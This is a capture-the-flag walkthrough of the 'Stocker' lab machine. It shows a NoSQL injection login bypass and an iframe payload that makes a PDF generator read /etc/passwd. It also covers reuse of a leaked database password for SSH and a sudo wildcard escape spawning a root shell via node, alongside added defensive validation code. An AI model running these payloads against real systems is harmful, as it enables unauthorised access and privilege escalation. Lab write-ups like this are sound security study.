Stocker

Recon

nmap_scan.log
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
I scanned my computer so many times, it thinks we're dating.

[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.129.228.197:22
Open 10.129.228.197:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -vvv -sV -sC -Pn" on ip 10.129.228.197
Depending on the complexity of the script, results may take some time to appear.
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2024-11-25 17:10 UTC
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:10
Completed NSE at 17:10, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:10
Completed NSE at 17:10, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:10
Completed NSE at 17:10, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 17:10
Completed Parallel DNS resolution of 1 host. at 17:10, 0.09s elapsed
DNS resolution of 1 IPs took 0.09s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 17:10
Scanning 10.129.228.197 [2 ports]
Discovered open port 22/tcp on 10.129.228.197
Discovered open port 80/tcp on 10.129.228.197
Completed Connect Scan at 17:10, 0.08s elapsed (2 total ports)
Initiating Service scan at 17:10
Scanning 2 services on 10.129.228.197
Completed Service scan at 17:11, 6.17s elapsed (2 services on 1 host)
NSE: Script scanning 10.129.228.197.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:11
Completed NSE at 17:11, 2.29s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:11
Completed NSE at 17:11, 0.32s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:11
Completed NSE at 17:11, 0.01s elapsed
Nmap scan report for 10.129.228.197
Host is up, received user-set (0.074s latency).
Scanned at 2024-11-25 17:10:54 UTC for 9s

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3d:12:97:1d:86:bc:16:16:83:60:8f:4f:06:e6:d5:4e (RSA)
|   256 7c:4d:1a:78:68:ce:12:00:df:49:10:37:f9:ad:17:4f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNgPXCNqX65/kNxcEEVPqpV7du+KsPJokAydK/wx1GqHpuUm3lLjMuLOnGFInSYGKlCK1MLtoCX6DjVwx6nWZ5w=
|   256 dd:97:80:50:a5:ba:cd:7d:55:e8:27:ed:28:fd:aa:3b (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIDyp1s8jG+rEbfeqAQbCqJw5+Y+T17PRzOcYd+W32hF
80/tcp open  http    syn-ack nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://stocker.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:11
Completed NSE at 17:11, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:11
Completed NSE at 17:11, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:11
Completed NSE at 17:11, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.73 seconds

HTTP (80)

It looks like a placeholder SPA; no additional pages are reachable from its links.


Perform subdomain enumeration

└─$ domain='stocker.htb'; ffuf -u "http://$domain/" -H "Host: FUZZ.$domain" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -mc all -fl 8
       v2.1.0-dev
________________________________________________
dev                     [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 80ms]

The login page is vulnerable to NoSQL injection.


Replaying the Burp request in the browser sets the right session cookie and we get redirected past the login, bypassing authentication.
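The login bypass above works because the handler builds its Mongoose query straight from the parsed JSON body, so a client can send an object in place of a string and MongoDB interprets it as a query operator. The following is an added example of the server-side validation that closes that hole; it is not code from the Stocker application, and the `username`/`password` field names are assumed.

```javascript
// Added example, not the Stocker app's code. Field names are assumed.
// Closes the login NoSQL injection: a query such as
//   User.findOne({ username: req.body.username, password: req.body.password })
// is only safe when both values are guaranteed to be plain strings.

// Accept only a plain, bounded string. Objects (operator carriers), arrays,
// numbers and booleans are rejected rather than coerced.
function asCredential(value, maxLen = 64) {
  if (typeof value !== "string") return null;
  if (value.length === 0 || value.length > maxLen) return null;
  return value;
}

// Second line of defence for bodies that reach the driver as a whole: refuse
// any key that starts with "$" (operator) or contains "." (field path), at
// any nesting depth, arrays included.
function hasOperatorKeys(obj) {
  if (obj === null || typeof obj !== "object") return false;
  return Object.entries(obj).some(
    ([k, v]) => k.startsWith("$") || k.includes(".") || hasOperatorKeys(v)
  );
}

// Returns validated string credentials or null (the caller answers 400).
// The lookup should then be findOne({ username }) followed by a hash
// comparison of the password, never a match on the plaintext in the query.
function validateLogin(body) {
  if (body === null || typeof body !== "object" || hasOperatorKeys(body)) {
    return null;
  }
  const username = asCredential(body.username);
  const password = asCredential(body.password, 256);
  if (username === null || password === null) return null;
  return { username, password };
}
```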


After "purchasing" the Cup we get an order ID and an order receipt.


The username we are logged in as is Angoose, which refers to a JS NoSQL library, so most likely there is another injection somewhere.

└─$ curl -LOs http://dev.stocker.htb/api/po/6744b18325a793e77791129f

└─$ file 6744b18325a793e77791129f
6744b18325a793e77791129f: PDF document, version 1.4, 1 page(s)

└─$ exiftool 6744b18325a793e77791129f
ExifTool Version Number         : 12.76
File Name                       : 6744b18325a793e77791129f
Directory                       : .
File Size                       : 38 kB
File Modification Date/Time     : 2024:11:25 12:26:36-05:00
File Access Date/Time           : 2024:11:25 12:26:40-05:00
File Inode Change Date/Time     : 2024:11:25 12:26:36-05:00
File Permissions                : -rw-rw-r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.4
Linearized                      : No
Page Count                      : 1
Tagged PDF                      : Yes
Creator                         : Chromium
Producer                        : Skia/PDF m108
Create Date                     : 2024:11:25 17:26:34+00:00
Modify Date                     : 2024:11:25 17:26:34+00:00

Chromium is the creator, so we can try an XSS attack against the dynamic PDF generation: with an iframe we can read the /etc/passwd file.

<iframe src=/etc/passwd width=1000 height=1000></iframe>
root:x:0:0:root:/root:/bin/bash
...
mongodb:x:113:65534::/home/mongodb:/usr/sbin/nologin
angoose:x:1001:1001:,,,:/home/angoose:/bin/bash
_laurel:x:998:998::/var/log/laurel:/bin/false

I was trying to get the location of the applications via the nginx configuration, but was unlucky. Plus, the files were too big for the PDF.

If we send malformed JSON to /api/order, the resulting stack trace leaks information about the application, including its path on disk.

SyntaxError: Unexpected string in JSON at position 188
    at JSON.parse (<anonymous>)
    at parse (/var/www/dev/node_modules/body-parser/lib/types/json.js:89:19)
    at /var/www/dev/node_modules/body-parser/lib/read.js:128:18
    at AsyncResource.runInAsyncScope (node:async_hooks:203:9)
    at invokeCallback (/var/www/dev/node_modules/raw-body/index.js:231:16)
    at done (/var/www/dev/node_modules/raw-body/index.js:220:7)
    at IncomingMessage.onEnd (/var/www/dev/node_modules/raw-body/index.js:280:7)
    at IncomingMessage.emit (node:events:513:28)
    at endReadableNT (node:internal/streams/readable:1359:12)
    at process.processTicksAndRejections (node:internal/process/task_queues:82:21)

The .env file doesn't exist, but /var/www/dev/index.js contains the MongoDB connection string.

// TODO: Configure loading from dotenv for production
const dbURI = "mongodb://dev:IHeardPassphrasesArePrettySecure@localhost/dev?authSource=admin&w=1";

SSH (22)

Creds (the MongoDB password from index.js, reused for the angoose account): angoose:IHeardPassphrasesArePrettySecure

└─$ ssh angoose@stocker.htb
angoose@stocker:~$ id
uid=1001(angoose) gid=1001(angoose) groups=1001(angoose)

User.txt

angoose@stocker:~$ cat user.txt
6133fb72c0c9ecb9c7d8d4e4301e2c70

Privilege Escalation

angoose@stocker:~$ sudo -l
Matching Defaults entries for angoose on stocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User angoose may run the following commands on stocker:
    (ALL) /usr/bin/node /usr/local/scripts/*.js

https://gtfobins.github.io/gtfobins/node/

angoose@stocker:~$ echo 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})' > t.js
angoose@stocker:~$ sudo /usr/bin/node /usr/local/scripts/../../../home/angoose/t.js
# id
uid=0(root) gid=0(root) groups=0(root)
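The sudo rule is escapable because sudoers(5) matches command-line arguments with fnmatch-style wildcards in which `*` also matches `/`, unlike a shell glob, so `/usr/local/scripts/*.js` is satisfied by a path that walks back out of the directory. The following added example (not from the box, and not sudo's own code) models that argument matching for `*` and `?` only, shows the containment check a wrapper script would need instead, and flags wildcard arguments in a sudoers command spec.

```javascript
// Added example, not from the box or from sudo itself. Models sudoers(5)
// argument matching ("*" and "?" only) to show why the rule
//   (ALL) /usr/bin/node /usr/local/scripts/*.js
// is escapable, and the path check a wrapper would need instead.

function sudoersArgMatches(pattern, arg) {
  let re = "^";
  for (const ch of pattern) {
    if (ch === "*") re += ".*";      // any run of characters, "/" included
    else if (ch === "?") re += ".";  // any single character, "/" included
    else re += ch.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
  }
  return new RegExp(re + "$").test(arg);
}

// Collapse "." and ".." segments of an absolute POSIX path (no symlink
// resolution; a real wrapper would also call fs.realpathSync).
function normalizePosix(p) {
  const out = [];
  for (const seg of p.split("/")) {
    if (seg === "" || seg === ".") continue;
    if (seg === "..") out.pop();
    else out.push(seg);
  }
  return "/" + out.join("/");
}

// What the rule intended: after normalisation the script must sit directly
// in baseDir and end in ".js". This is the check sudo's glob never performs.
function isScriptInside(baseDir, scriptArg) {
  const resolved = normalizePosix(scriptArg);
  const dir = resolved.slice(0, resolved.lastIndexOf("/"));
  return dir === normalizePosix(baseDir) && resolved.endsWith(".js");
}

// Sudoers audit helper: wildcards in the command path do not match "/", but
// wildcards in arguments do, so any argument containing one is flagged.
function auditRule(commandSpec) {
  const [cmd, ...args] = commandSpec.trim().split(/\s+/);
  const wildcardArgs = args.filter((a) => /[*?\[]/.test(a));
  return { cmd, wildcardArgs, risky: wildcardArgs.length > 0 };
}
```

The safe replacement is a rule without wildcard arguments, for example one fixed script path per line, or a wrapper that performs the `isScriptInside` check on a resolved real path before handing off to node.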

Root.txt

# cd /root
# cat root.txt
529752b61de9796389ee08a0f61b7412
